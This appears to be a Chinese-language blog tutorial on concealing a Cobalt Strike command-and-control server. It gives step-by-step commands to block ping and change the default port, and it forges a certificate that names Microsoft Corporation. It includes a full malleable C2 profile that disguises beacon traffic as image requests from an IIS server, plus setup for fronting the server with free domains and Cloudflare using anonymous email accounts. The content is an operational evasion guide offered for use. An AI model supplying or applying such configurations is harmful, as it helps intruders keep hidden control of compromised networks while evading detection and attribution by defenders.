內網神器Cobalt Strike隱藏特征與流量混淆

CS服務端配置

0x01. 需求配置

vps一臺
域名
CDN
Cobalt Strike4.0

0x02. 服務器設置禁ping

服務器禁ping從某種意義上來說，算是不存活的主機，但nmap是依然能夠掃描出來的。設置禁ping命令：

vim /etc/sysctl.conf 打開后按i進入編輯模式，在任意位置新增以下內容
net.ipv4.icmp_echo_ignore_all=1

新增之后 ESC -> 冒號 -> wq[退出并保存]再使用命令 sysctl -p 即可生效，這時候再ping主機就會ping不通了。

0x03. 修改Cobalt Strike默認端口號

在服務端的teamserver文件末尾處修改

修改之后再次啟動teamserver的時候即可看到端口已經更改。

0x04. 修改默認證書

Cobalt Strike默認證書中含有與cs相關的特征，所以需要替換掉cs原有的證書，重新生成一個無特征的證書文件。前提條件：服務器上已安裝java使用jdk自帶的keytools這個java證書管理工具來生成新的無特征證書。

首先刪除cobalt strike原有的證書
新建一個其他名字,只需要在teamserver最后一行修改 -Djavax.net.ssl.keyStore=./new.store 即可
在Cobalt Strike當前目錄生成一個無特征的證書

keytool -keystore 生成的store名 -storepass 密碼 -keypass 密碼 -genkey -keyalg RSA -alias 自定義別名 -dname "CN=Microsoft Windows, OU=MOPR, O=Microsoft Corporation, L=Redmond, ST=Washington, C=US"
keytool -keystore new.store -storepass bypass -keypass bypass -genkey -keyalg RSA -alias apex.tk -dname "CN=Microsoft Windows, OU=MOPR, O=Microsoft Corporation, L=Redmond, ST=Washington, C=US"

修改證書標準并應用

> keytool -importkeystore -srckeystore cobaltstrike.store -destkeystore cobaltstrike.store -deststoretype pkcs12

至此證書修改完成，使用命令:keytool -list -v -keystore cobaltstrike.store 可查看證書內容

可以看到簽名是92EE36結尾，啟動teamserver看看證書簽名是否一致：

簽名一致，確認證書修改成功.

0x05.混淆流量

接下來修改Beacon與cobalt strike通信時候的流量特征，創建一個.profile文件(名字任意)，貼入以下從大佬那里偷過來的代碼。

https-certificate {
    set keystore "new.store";    #證書名字
    set password "bypass";        #證書密碼
}
#以上沒有配置cloudflare的時候可以先不寫
http-get {
    set uri "/image/";
    client {
        header "Accept" "text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8";
        header "Referer" "http://www.google.com";
        header "Host" "apex1.tk";  #域名,還沒有配置cloudflare的時候這一行注釋掉
        header "Pragma" "no-cache";
        header "Cache-Control" "no-cache";
        metadata {
            netbios;
            append ".jpg";  # 傳輸內容自動追加的后綴
            uri-append;
        }
    }
    server {
        header "Content-Type" "img/jpg";
        header "Server" "Microsoft-IIS/6.0";
        header "X-Powered-By" "ASP.NET";
        output {
            base64;  # 加密方式（base64、base64url、netbios、netbiosu）
            print;
        }
    }
}
http-post {
    set uri "/email/";
    client {
        header "Content-Type" "application/octet-stream";
        header "Referer" "http://www.google.com"; 
        header "Host" "apex1.tk";  #域名,還沒有配置cloudflare的時候這一行注釋掉
        header "Pragma" "no-cache";
        header "Cache-Control" "no-cache";
        id {
            netbiosu;
            append ".png";
            uri-append;
        }
        output {
            base64;
            print;
        }
    }
    server {
        header "Content-Type" "img/jpg";
        header "Server" "Microsoft-IIS/6.0";
        header "X-Powered-By" "ASP.NET";
        output {
            base64;
            print;
        }
    }
}

保存之后賦予服務端的c2lint執行權限：chmod 777 c2lint

然后輸入：./c2lint img.profile

輸出如下圖所示即為配置成功

使用CDN隱藏

0x01. 申請免費域名(白嫖是真香啊.)

白嫖域名連接：www.freenom.com 可以用來做博客域名、也可用來做其他用處白嫖的可以不留過多信息，使用谷歌賬號登錄即可.記得科學上網掛著，不然有可能申請不通過。

域名自己隨便寫一個喜歡的即可，檢查可用性，然后點擊selected，Checkout即可，1-12個月都是免費的

0x02. CDN配置(白嫖系列)

一時白嫖一時爽，一直白嫖一直爽，使用Cloudflare白嫖cdn.有賬號可以繼續使用該賬號進行添加站點，沒有賬號使用匿名郵箱注冊一個即可.(推薦outlook、protonmail都可匿名)

1. 添加站點記錄

這里添加站點，有時候會報錯，google、baidu了很多方法都不管用，于是乎第二天就可以添加到了。

2. 添加DNS記錄

根據自己喜歡隨便整就行，解析記得寫vps的地址，代理狀態是默認開啟，沒有的話手動開啟一下即可.

3. 修改DNS服務器

去freenom中刪除dns名稱服務器，添加為cloudflare的名稱服務器

到freenom中修改dns服務器

4. 配置完成

以上操作完成之后回到cloudflare進行下一步將https重寫、始終使用https、Brotli都關閉并保存，之后點擊檢查名稱服務器點擊檢查之后過一會兒刷新一下頁面，出現以下就代表成功了

一定要開啟開發者模式！！！緩存 -> 開發模式開啟

Cloudflare CDN支持的http端口：80,8080,8880,2052,2082,2086,2098Cloudflare CDN支持的https端口：443,2053,2083,2087,2096,8443

5.HTTPS證書配置

首先配置配置SSL/TLS加密模式為完全，點擊源服務器 -> 創建證書，把密鑰和證書復制保存下來，分別保存為pem.pem和key.key，然后上傳到cobalt strike服務端

上傳到服務端之后，使用keytool重新創建store證書：

首先執行openssl pkcs12 -export -in 證書名 -inkey 私鑰名 -out p12名,如abc.p12 -name 域名 -passout pass:bypass

openssl pkcs12 -export -in pem.pem -inkey key.key -out apex.tk.p12 -name apex.tk -passout pass:bypass

其次執行keytool -importkeystore -deststorepass 密碼 -destkeypass 密碼 -destkeystore store名 -srckeystore p12名,如abc.p12 -srcstoretype PKCS12 -srcstor epass 密碼 -alias 別名

keytool -importkeystore -deststorepass bypass -destkeypass bypass -destkeystore new.store -srckeystore apex.tk.p12 -srcstoretype PKCS12 -srcstor epass bypass -alias apex.tk

最后在profile配置文件中，取消注釋頭部的代碼即可。

啟動服務端的時候命令：./teamserver xx.xx.xx.xx password img.profile

6.測試上線

Listener按照下圖配置，HTTPS同理

參考文檔：https://www.jianshu.com/p/e7701efef047https://www.cnblogs.com/Xy--1/p/14396744.htmlhttps://lengjibo.github.io/malleable/